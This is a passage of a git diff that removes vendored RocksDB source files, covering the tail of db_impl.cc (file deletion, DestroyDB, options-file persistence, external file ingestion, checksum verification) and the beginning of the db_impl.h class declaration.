-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    status = versions_->GetMetadataForFile(number, &level, &metadata, &cfd);
-    if (!status.ok()) {
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "DeleteFile %s failed. File not found\n", name.c_str());
-      job_context.Clean();
-      return Status::InvalidArgument("File not found");
-    }
-    assert(level < cfd->NumberLevels());
-
-    // If the file is being compacted no need to delete.
-    if (metadata->being_compacted) {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "DeleteFile %s Skipped. File about to be compacted\n",
-                     name.c_str());
-      job_context.Clean();
-      return Status::OK();
-    }
-
-    // Only the files in the last level can be deleted externally.
-    // This is to make sure that any deletion tombstones are not
-    // lost. Check that the level passed is the last level.
-    auto* vstoreage = cfd->current()->storage_info();
-    for (int i = level + 1; i < cfd->NumberLevels(); i++) {
-      if (vstoreage->NumLevelFiles(i) != 0) {
-        ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                       "DeleteFile %s FAILED. File not in last level\n",
-                       name.c_str());
-        job_context.Clean();
-        return Status::InvalidArgument("File not in last level");
-      }
-    }
-    // if level == 0, it has to be the oldest file
-    if (level == 0 &&
-        vstoreage->LevelFiles(0).back()->fd.GetNumber() != number) {
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "DeleteFile %s failed ---"
-                     " target file in level 0 must be the oldest.",
-                     name.c_str());
-      job_context.Clean();
-      return Status::InvalidArgument("File in level 0, but not oldest");
-    }
-    edit.SetColumnFamily(cfd->GetID());
-    edit.DeleteFile(level, number);
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-    FindObsoleteFiles(&job_context, false);
-  }  // lock released here
-
-  LogFlush(immutable_db_options_.info_log);
-  // remove files outside the db-lock
-  if (job_context.HaveSomethingToDelete()) {
-    // Call PurgeObsoleteFiles() without holding mutex.
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  return status;
-}
-
-Status DBImpl::DeleteFilesInRange(ColumnFamilyHandle* column_family,
-                                  const Slice* begin, const Slice* end) {
-  Status status;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  ColumnFamilyData* cfd = cfh->cfd();
-  VersionEdit edit;
-  std::vector<FileMetaData*> deleted_files;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    Version* input_version = cfd->current();
-
-    auto* vstorage = input_version->storage_info();
-    for (int i = 1; i < cfd->NumberLevels(); i++) {
-      if (vstorage->LevelFiles(i).empty() ||
-          !vstorage->OverlapInLevel(i, begin, end)) {
-        continue;
-      }
-      std::vector<FileMetaData*> level_files;
-      InternalKey begin_storage, end_storage, *begin_key, *end_key;
-      if (begin == nullptr) {
-        begin_key = nullptr;
-      } else {
-        begin_storage.SetMaxPossibleForUserKey(*begin);
-        begin_key = &begin_storage;
-      }
-      if (end == nullptr) {
-        end_key = nullptr;
-      } else {
-        end_storage.SetMinPossibleForUserKey(*end);
-        end_key = &end_storage;
-      }
-
-      vstorage->GetOverlappingInputs(i, begin_key, end_key, &level_files, -1,
-                                     nullptr, false);
-      FileMetaData* level_file;
-      for (uint32_t j = 0; j < level_files.size(); j++) {
-        level_file = level_files[j];
-        if (((begin == nullptr) ||
-             (cfd->internal_comparator().user_comparator()->Compare(
-                  level_file->smallest.user_key(), *begin) >= 0)) &&
-            ((end == nullptr) ||
-             (cfd->internal_comparator().user_comparator()->Compare(
-                  level_file->largest.user_key(), *end) <= 0))) {
-          if (level_file->being_compacted) {
-            continue;
-          }
-          edit.SetColumnFamily(cfd->GetID());
-          edit.DeleteFile(i, level_file->fd.GetNumber());
-          deleted_files.push_back(level_file);
-          level_file->being_compacted = true;
-        }
-      }
-    }
-    if (edit.GetDeletedFiles().empty()) {
-      job_context.Clean();
-      return Status::OK();
-    }
-    input_version->Ref();
-    status = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                    &edit, &mutex_, directories_.GetDbDir());
-    if (status.ok()) {
-      InstallSuperVersionAndScheduleWorkWrapper(
-          cfd, &job_context, *cfd->GetLatestMutableCFOptions());
-    }
-    for (auto* deleted_file : deleted_files) {
-      deleted_file->being_compacted = false;
-    }
-    input_version->Unref();
-    FindObsoleteFiles(&job_context, false);
-  }  // lock released here
-
-  LogFlush(immutable_db_options_.info_log);
-  // remove files outside the db-lock
-  if (job_context.HaveSomethingToDelete()) {
-    // Call PurgeObsoleteFiles() without holding mutex.
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  return status;
-}
-
-void DBImpl::GetLiveFilesMetaData(std::vector<LiveFileMetaData>* metadata) {
-  InstrumentedMutexLock l(&mutex_);
-  versions_->GetLiveFilesMetaData(metadata);
-}
-
-void DBImpl::GetColumnFamilyMetaData(
-    ColumnFamilyHandle* column_family,
-    ColumnFamilyMetaData* cf_meta) {
-  assert(column_family);
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  auto* sv = GetAndRefSuperVersion(cfd);
-  sv->current->GetColumnFamilyMetaData(cf_meta);
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::CheckConsistency() {
-  mutex_.AssertHeld();
-  std::vector<LiveFileMetaData> metadata;
-  versions_->GetLiveFilesMetaData(&metadata);
-
-  std::string corruption_messages;
-  for (const auto& md : metadata) {
-    // md.name has a leading "/".
-    std::string file_path = md.db_path + md.name;
-
-    uint64_t fsize = 0;
-    Status s = env_->GetFileSize(file_path, &fsize);
-    if (!s.ok() &&
-        env_->GetFileSize(Rocks2LevelTableFileName(file_path), &fsize).ok()) {
-      s = Status::OK();
-    }
-    if (!s.ok()) {
-      corruption_messages +=
-          "Can't access " + md.name + ": " + s.ToString() + "\n";
-    } else if (fsize != md.size) {
-      corruption_messages += "Sst file size mismatch: " + file_path +
-                             ". Size recorded in manifest " +
-                             ToString(md.size) + ", actual size " +
-                             ToString(fsize) + "\n";
-    }
-  }
-  if (corruption_messages.size() == 0) {
-    return Status::OK();
-  } else {
-    return Status::Corruption(corruption_messages);
-  }
-}
-
-Status DBImpl::GetDbIdentity(std::string& identity) const {
-  std::string idfilename = IdentityFileName(dbname_);
-  const EnvOptions soptions;
-  unique_ptr<SequentialFileReader> id_file_reader;
-  Status s;
-  {
-    unique_ptr<SequentialFile> idfile;
-    s = env_->NewSequentialFile(idfilename, &idfile, soptions);
-    if (!s.ok()) {
-      return s;
-    }
-    id_file_reader.reset(new SequentialFileReader(std::move(idfile)));
-  }
-
-  uint64_t file_size;
-  s = env_->GetFileSize(idfilename, &file_size);
-  if (!s.ok()) {
-    return s;
-  }
-  char* buffer = reinterpret_cast<char*>(alloca(file_size));
-  Slice id;
-  s = id_file_reader->Read(static_cast<size_t>(file_size), &id, buffer);
-  if (!s.ok()) {
-    return s;
-  }
-  identity.assign(id.ToString());
-  // If last character is '\n' remove it from identity
-  if (identity.size() > 0 && identity.back() == '\n') {
-    identity.pop_back();
-  }
-  return s;
-}
-
-// Default implementation -- returns not supported status
-Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                              const std::string& column_family_name,
-                              ColumnFamilyHandle** handle) {
-  return Status::NotSupported("");
-}
-
-Status DB::CreateColumnFamilies(
-    const ColumnFamilyOptions& cf_options,
-    const std::vector<std::string>& column_family_names,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  return Status::NotSupported("");
-}
-
-Status DB::CreateColumnFamilies(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  return Status::NotSupported("");
-}
-
-Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) {
-  return Status::NotSupported("");
-}
-
-Status DB::DropColumnFamilies(
-    const std::vector<ColumnFamilyHandle*>& column_families) {
-  return Status::NotSupported("");
-}
-
-Status DB::DestroyColumnFamilyHandle(ColumnFamilyHandle* column_family) {
-  delete column_family;
-  return Status::OK();
-}
-
-DB::~DB() { }
-
-Status DB::ListColumnFamilies(const DBOptions& db_options,
-                              const std::string& name,
-                              std::vector<std::string>* column_families) {
-  return VersionSet::ListColumnFamilies(column_families, name, db_options.env);
-}
-
-Snapshot::~Snapshot() {
-}
-
-Status DestroyDB(const std::string& dbname, const Options& options) {
-  const ImmutableDBOptions soptions(SanitizeOptions(dbname, options));
-  Env* env = soptions.env;
-  std::vector<std::string> filenames;
-
-  // Ignore error in case directory does not exist
-  env->GetChildren(dbname, &filenames);
-
-  FileLock* lock;
-  const std::string lockname = LockFileName(dbname);
-  Status result = env->LockFile(lockname, &lock);
-  if (result.ok()) {
-    uint64_t number;
-    FileType type;
-    InfoLogPrefix info_log_prefix(!soptions.db_log_dir.empty(), dbname);
-    for (size_t i = 0; i < filenames.size(); i++) {
-      if (ParseFileName(filenames[i], &number, info_log_prefix.prefix, &type) &&
-          type != kDBLockFile) {  // Lock file will be deleted at end
-        Status del;
-        std::string path_to_delete = dbname + "/" + filenames[i];
-        if (type == kMetaDatabase) {
-          del = DestroyDB(path_to_delete, options);
-        } else if (type == kTableFile) {
-          del = DeleteSSTFile(&soptions, path_to_delete, 0);
-        } else {
-          del = env->DeleteFile(path_to_delete);
-        }
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    for (size_t path_id = 0; path_id < options.db_paths.size(); path_id++) {
-      const auto& db_path = options.db_paths[path_id];
-      env->GetChildren(db_path.path, &filenames);
-      for (size_t i = 0; i < filenames.size(); i++) {
-        if (ParseFileName(filenames[i], &number, &type) &&
-            type == kTableFile) {  // Lock file will be deleted at end
-          std::string table_path = db_path.path + "/" + filenames[i];
-          Status del = DeleteSSTFile(&soptions, table_path,
-                                     static_cast<uint32_t>(path_id));
-          if (result.ok() && !del.ok()) {
-            result = del;
-          }
-        }
-      }
-    }
-
-    std::vector<std::string> walDirFiles;
-    std::string archivedir = ArchivalDirectory(dbname);
-    if (dbname != soptions.wal_dir) {
-      env->GetChildren(soptions.wal_dir, &walDirFiles);
-      archivedir = ArchivalDirectory(soptions.wal_dir);
-    }
-
-    // Delete log files in the WAL dir
-    for (const auto& file : walDirFiles) {
-      if (ParseFileName(file, &number, &type) && type == kLogFile) {
-        Status del = env->DeleteFile(LogFileName(soptions.wal_dir, number));
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    std::vector<std::string> archiveFiles;
-    env->GetChildren(archivedir, &archiveFiles);
-    // Delete archival files.
-    for (size_t i = 0; i < archiveFiles.size(); ++i) {
-      if (ParseFileName(archiveFiles[i], &number, &type) &&
-          type == kLogFile) {
-        Status del = env->DeleteFile(archivedir + "/" + archiveFiles[i]);
-        if (result.ok() && !del.ok()) {
-          result = del;
-        }
-      }
-    }
-
-    // ignore case where no archival directory is present
-    env->DeleteDir(archivedir);
-
-    env->UnlockFile(lock);  // Ignore error since state is already gone
-    env->DeleteFile(lockname);
-    env->DeleteDir(dbname);  // Ignore error in case dir contains other files
-    env->DeleteDir(soptions.wal_dir);
-  }
-  return result;
-}
-
-Status DBImpl::WriteOptionsFile(bool need_mutex_lock,
-                                bool need_enter_write_thread) {
-#ifndef ROCKSDB_LITE
-  WriteThread::Writer w;
-  if (need_mutex_lock) {
-    mutex_.Lock();
-  } else {
-    mutex_.AssertHeld();
-  }
-  if (need_enter_write_thread) {
-    write_thread_.EnterUnbatched(&w, &mutex_);
-  }
-
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-
-  // This part requires mutex to protect the column family options
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    cf_names.push_back(cfd->GetName());
-    cf_opts.push_back(cfd->GetLatestCFOptions());
-  }
-
-  // Unlock during expensive operations.  New writes cannot get here
-  // because the single write thread ensures all new writes get queued.
-  DBOptions db_options =
-      BuildDBOptions(immutable_db_options_, mutable_db_options_);
-  mutex_.Unlock();
-
-  TEST_SYNC_POINT("DBImpl::WriteOptionsFile:1");
-  TEST_SYNC_POINT("DBImpl::WriteOptionsFile:2");
-
-  std::string file_name =
-      TempOptionsFileName(GetName(), versions_->NewFileNumber());
-  Status s =
-      PersistRocksDBOptions(db_options, cf_names, cf_opts, file_name, GetEnv());
-
-  if (s.ok()) {
-    s = RenameTempFileToOptionsFile(file_name);
-  }
-  // restore lock
-  if (!need_mutex_lock) {
-    mutex_.Lock();
-  }
-  if (need_enter_write_thread) {
-    write_thread_.ExitUnbatched(&w);
-  }
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "Unnable to persist options -- %s", s.ToString().c_str());
-    if (immutable_db_options_.fail_if_options_file_error) {
-      return Status::IOError("Unable to persist options.",
-                             s.ToString().c_str());
-    }
-  }
-#endif  // !ROCKSDB_LITE
-  return Status::OK();
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-void DeleteOptionsFilesHelper(const std::map<uint64_t, std::string>& filenames,
-                              const size_t num_files_to_keep,
-                              const std::shared_ptr<Logger>& info_log,
-                              Env* env) {
-  if (filenames.size() <= num_files_to_keep) {
-    return;
-  }
-  for (auto iter = std::next(filenames.begin(), num_files_to_keep);
-       iter != filenames.end(); ++iter) {
-    if (!env->DeleteFile(iter->second).ok()) {
-      ROCKS_LOG_WARN(info_log, "Unable to delete options file %s",
-                     iter->second.c_str());
-    }
-  }
-}
-}  // namespace
-#endif  // !ROCKSDB_LITE
-
-Status DBImpl::DeleteObsoleteOptionsFiles() {
-#ifndef ROCKSDB_LITE
-  std::vector<std::string> filenames;
-  // use ordered map to store keep the filenames sorted from the newest
-  // to the oldest.
-  std::map<uint64_t, std::string> options_filenames;
-  Status s;
-  s = GetEnv()->GetChildren(GetName(), &filenames);
-  if (!s.ok()) {
-    return s;
-  }
-  for (auto& filename : filenames) {
-    uint64_t file_number;
-    FileType type;
-    if (ParseFileName(filename, &file_number, &type) && type == kOptionsFile) {
-      options_filenames.insert(
-          {std::numeric_limits<uint64_t>::max() - file_number,
-           GetName() + "/" + filename});
-    }
-  }
-
-  // Keeps the latest 2 Options file
-  const size_t kNumOptionsFilesKept = 2;
-  DeleteOptionsFilesHelper(options_filenames, kNumOptionsFilesKept,
-                           immutable_db_options_.info_log, GetEnv());
-  return Status::OK();
-#else
-  return Status::OK();
-#endif  // !ROCKSDB_LITE
-}
-
-Status DBImpl::RenameTempFileToOptionsFile(const std::string& file_name) {
-#ifndef ROCKSDB_LITE
-  Status s;
-
-  versions_->options_file_number_ = versions_->NewFileNumber();
-  std::string options_file_name =
-      OptionsFileName(GetName(), versions_->options_file_number_);
-  // Retry if the file name happen to conflict with an existing one.
-  s = GetEnv()->RenameFile(file_name, options_file_name);
-
-  DeleteObsoleteOptionsFiles();
-  return s;
-#else
-  return Status::OK();
-#endif  // !ROCKSDB_LITE
-}
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-void DBImpl::NewThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::NewColumnFamilyInfo(this, cfd, cfd->GetName(),
-                                          cfd->ioptions()->env);
-  }
-}
-
-void DBImpl::EraseThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::EraseColumnFamilyInfo(cfd);
-  }
-}
-
-void DBImpl::EraseThreadStatusDbInfo() const {
-  if (immutable_db_options_.enable_thread_tracking) {
-    ThreadStatusUtil::EraseDatabaseInfo(this);
-  }
-}
-
-#else
-void DBImpl::NewThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-}
-
-void DBImpl::EraseThreadStatusCfInfo(
-    ColumnFamilyData* cfd) const {
-}
-
-void DBImpl::EraseThreadStatusDbInfo() const {
-}
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-//
-// A global method that can dump out the build version
-void DumpRocksDBBuildVersion(Logger * log) {
-#if !defined(IOS_CROSS_COMPILE)
-  // if we compile with Xcode, we don't run build_detect_version, so we don't
-  // generate util/build_version.cc
-  ROCKS_LOG_HEADER(log, "RocksDB version: %d.%d.%d\n", ROCKSDB_MAJOR,
-                   ROCKSDB_MINOR, ROCKSDB_PATCH);
-  ROCKS_LOG_HEADER(log, "Git sha %s", rocksdb_build_git_sha);
-  ROCKS_LOG_HEADER(log, "Compile date %s", rocksdb_build_compile_date);
-#endif
-}
-
-#ifndef ROCKSDB_LITE
-SequenceNumber DBImpl::GetEarliestMemTableSequenceNumber(SuperVersion* sv,
-                                                         bool include_history) {
-  // Find the earliest sequence number that we know we can rely on reading
-  // from the memtable without needing to check sst files.
-  SequenceNumber earliest_seq =
-      sv->imm->GetEarliestSequenceNumber(include_history);
-  if (earliest_seq == kMaxSequenceNumber) {
-    earliest_seq = sv->mem->GetEarliestSequenceNumber();
-  }
-  assert(sv->mem->GetEarliestSequenceNumber() >= earliest_seq);
-
-  return earliest_seq;
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key,
-                                       bool cache_only, SequenceNumber* seq,
-                                       bool* found_record_for_key,
-                                       bool* is_blob_index) {
-  Status s;
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(sv->mem->GetInternalKeyComparator(),
-                                   kMaxSequenceNumber);
-
-  ReadOptions read_options;
-  SequenceNumber current_seq = versions_->LastSequence();
-  LookupKey lkey(key, current_seq);
-
-  *seq = kMaxSequenceNumber;
-  *found_record_for_key = false;
-
-  // Check if there is a record for this key in the latest memtable
-  sv->mem->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq,
-               read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Unexpected status returned from MemTable::Get: %s\n",
-                    s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check immutable memtables
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // Check if there is a record for this key in the immutable memtables
-  sv->imm->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq,
-               read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Unexpected status returned from MemTableList::Get: %s\n",
-                    s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check memtable history
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // Check if there is a record for this key in the immutable memtables
-  sv->imm->GetFromHistory(lkey, nullptr, &s, &merge_context, &range_del_agg,
-                          seq, read_options, is_blob_index);
-
-  if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-    // unexpected error reading memtable.
-    ROCKS_LOG_ERROR(
-        immutable_db_options_.info_log,
-        "Unexpected status returned from MemTableList::GetFromHistory: %s\n",
-        s.ToString().c_str());
-
-    return s;
-  }
-
-  if (*seq != kMaxSequenceNumber) {
-    // Found a sequence number, no need to check SST files
-    *found_record_for_key = true;
-    return Status::OK();
-  }
-
-  // TODO(agiardullo): possible optimization: consider checking cached
-  // SST files if cache_only=true?
-  if (!cache_only) {
-    // Check tables
-    sv->current->Get(read_options, lkey, nullptr, &s, &merge_context,
-                     &range_del_agg, nullptr /* value_found */,
-                     found_record_for_key, seq, is_blob_index);
-
-    if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) {
-      // unexpected error reading SST files
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Unexpected status returned from Version::Get: %s\n",
-                      s.ToString().c_str());
-
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status DBImpl::IngestExternalFile(
-    ColumnFamilyHandle* column_family,
-    const std::vector<std::string>& external_files,
-    const IngestExternalFileOptions& ingestion_options) {
-  Status status;
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Ingest should immediately fail if ingest_behind is requested,
-  // but the DB doesn't support it.
-  if (ingestion_options.ingest_behind) {
-    if (!immutable_db_options_.allow_ingest_behind) {
-      return Status::InvalidArgument(
-        "Can't ingest_behind file in DB with allow_ingest_behind=false");
-    }
-  }
-
-  ExternalSstFileIngestionJob ingestion_job(env_, versions_.get(), cfd,
-                                            immutable_db_options_, env_options_,
-                                            &snapshots_, ingestion_options);
-
-  std::list<uint64_t>::iterator pending_output_elem;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (!bg_error_.ok()) {
-      // Don't ingest files when there is a bg_error
-      return bg_error_;
-    }
-
-    // Make sure that bg cleanup wont delete the files that we are ingesting
-    pending_output_elem = CaptureCurrentFileNumberInPendingOutputs();
-  }
-
-  status = ingestion_job.Prepare(external_files);
-  if (!status.ok()) {
-    return status;
-  }
-
-  TEST_SYNC_POINT("DBImpl::AddFile:Start");
-  {
-    // Lock db mutex
-    InstrumentedMutexLock l(&mutex_);
-    TEST_SYNC_POINT("DBImpl::AddFile:MutexLock");
-
-    // Stop writes to the DB by entering both write threads
-    WriteThread::Writer w;
-    write_thread_.EnterUnbatched(&w, &mutex_);
-    WriteThread::Writer nonmem_w;
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.EnterUnbatched(&nonmem_w, &mutex_);
-    }
-
-    num_running_ingest_file_++;
-
-    // We cannot ingest a file into a dropped CF
-    if (cfd->IsDropped()) {
-      status = Status::InvalidArgument(
-          "Cannot ingest an external file into a dropped CF");
-    }
-
-    // Figure out if we need to flush the memtable first
-    if (status.ok()) {
-      bool need_flush = false;
-      status = ingestion_job.NeedsFlush(&need_flush);
-      TEST_SYNC_POINT_CALLBACK("DBImpl::IngestExternalFile:NeedFlush",
-                               &need_flush);
-      if (status.ok() && need_flush) {
-        mutex_.Unlock();
-        status = FlushMemTable(cfd, FlushOptions(), true /* writes_stopped */);
-        mutex_.Lock();
-      }
-    }
-
-    // Run the ingestion job
-    if (status.ok()) {
-      status = ingestion_job.Run();
-    }
-
-    // Install job edit [Mutex will be unlocked here]
-    auto mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    if (status.ok()) {
-      status =
-          versions_->LogAndApply(cfd, *mutable_cf_options, ingestion_job.edit(),
-                                 &mutex_, directories_.GetDbDir());
-    }
-    if (status.ok()) {
-      delete InstallSuperVersionAndScheduleWork(cfd, nullptr,
-                                                *mutable_cf_options);
-    }
-
-    // Resume writes to the DB
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-    }
-    write_thread_.ExitUnbatched(&w);
-
-    // Update stats
-    if (status.ok()) {
-      ingestion_job.UpdateStats();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_output_elem);
-
-    num_running_ingest_file_--;
-    if (num_running_ingest_file_ == 0) {
-      bg_cv_.SignalAll();
-    }
-
-    TEST_SYNC_POINT("DBImpl::AddFile:MutexUnlock");
-  }
-  // mutex_ is unlocked here
-
-  // Cleanup
-  ingestion_job.Cleanup(status);
-
-  if (status.ok()) {
-    NotifyOnExternalFileIngested(cfd, ingestion_job);
-  }
-
-  return status;
-}
-
-Status DBImpl::VerifyChecksum() {
-  Status s;
-  Options options;
-  EnvOptions env_options;
-  std::vector<ColumnFamilyData*> cfd_list;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->IsDropped() && cfd->initialized()) {
-        cfd->Ref();
-        cfd_list.push_back(cfd);
-      }
-    }
-  }
-  std::vector<SuperVersion*> sv_list;
-  for (auto cfd : cfd_list) {
-    sv_list.push_back(cfd->GetReferencedSuperVersion(&mutex_));
-  }
-  for (auto& sv : sv_list) {
-    VersionStorageInfo* vstorage = sv->current->storage_info();
-    for (int i = 0; i < vstorage->num_non_empty_levels() && s.ok(); i++) {
-      for (size_t j = 0; j < vstorage->LevelFilesBrief(i).num_files && s.ok();
-           j++) {
-        const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd;
-        std::string fname = TableFileName(immutable_db_options_.db_paths,
-                                          fd.GetNumber(), fd.GetPathId());
-        s = rocksdb::VerifySstFileChecksum(options, env_options, fname);
-      }
-    }
-    if (!s.ok()) {
-      break;
-    }
-  }
-  {
-    InstrumentedMutexLock l(&mutex_);
-    for (auto sv : sv_list) {
-      if (sv && sv->Unref()) {
-        sv->Cleanup();
-        delete sv;
-      }
-    }
-    for (auto cfd : cfd_list) {
-        cfd->Unref();
-    }
-  }
-  return s;
-}
-
-void DBImpl::NotifyOnExternalFileIngested(
-    ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.empty()) {
-    return;
-  }
-
-  for (const IngestedFileInfo& f : ingestion_job.files_to_ingest()) {
-    ExternalFileIngestionInfo info;
-    info.cf_name = cfd->GetName();
-    info.external_file_path = f.external_file_path;
-    info.internal_file_path = f.internal_file_path;
-    info.global_seqno = f.assigned_seqno;
-    info.table_properties = f.table_properties;
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnExternalFileIngested(this, info);
-    }
-  }
-
-#endif
-}
-
-void DBImpl::WaitForIngestFile() {
-  mutex_.AssertHeld();
-  while (num_running_ingest_file_ > 0) {
-    bg_cv_.Wait();
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl.h b/thirdparty/rocksdb/db/db_impl.h
deleted file mode 100644
index f1730f9..0000000
--- a/thirdparty/rocksdb/db/db_impl.h
+++ /dev/null
@@ -1,1301 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <limits>
-#include <list>
-#include <map>
-#include <queue>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction_job.h"
-#include "db/dbformat.h"
-#include "db/external_sst_file_ingestion_job.h"
-#include "db/flush_job.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/log_writer.h"
-#include "db/snapshot_impl.h"
-#include "db/version_edit.h"
-#include "db/wal_manager.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "memtable_list.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/hash.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class ArenaWrappedDBIter;
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-class WriteCallback;
-struct JobContext;
-struct ExternalSstFileInfo;
-struct MemTableInfo;
-
-class DBImpl : public DB {
- public:
-  DBImpl(const DBOptions& options, const std::string& dbname);
-  virtual ~DBImpl();
-
-  // Implementations of the DB interface
-  using DB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override;
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override;
-  using DB::Write;
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override;
-
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  // Function that Get and KeyMayExist call with no_io true or false
-  // Note: 'value_found' from KeyMayExist propagates here
-  Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family,
-                 const Slice& key, PinnableSlice* value,
-                 bool* value_found = nullptr, bool* is_blob_index = nullptr);
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                    const std::string& column_family,
-                                    ColumnFamilyHandle** handle) override;
-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& cf_options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles) override;
-  virtual Status CreateColumnFamilies(
